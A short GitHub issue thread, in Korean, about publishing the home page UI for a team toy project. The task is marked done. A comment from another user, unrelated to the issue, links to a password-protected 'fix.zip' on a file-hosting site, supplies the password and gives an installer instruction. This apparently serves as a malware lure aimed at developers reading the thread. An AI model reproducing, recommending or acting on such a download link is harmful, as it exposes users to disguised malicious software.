### ISSUE TITLE
[design] 홈(메인) 페이지 UI 퍼블리싱

### ISSUE THREAD

**Issue by dev-meryoung** [Dev-FE-1/Toy_Project_3_Team5#56]
### 📄 설명

홈(메인) 페이지 UI 퍼블리싱

### ✅ 해야 할 일

- [x] 홈(메인) 페이지 UI 퍼블리싱 작업

**Comment by TrymenT-AlphA** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
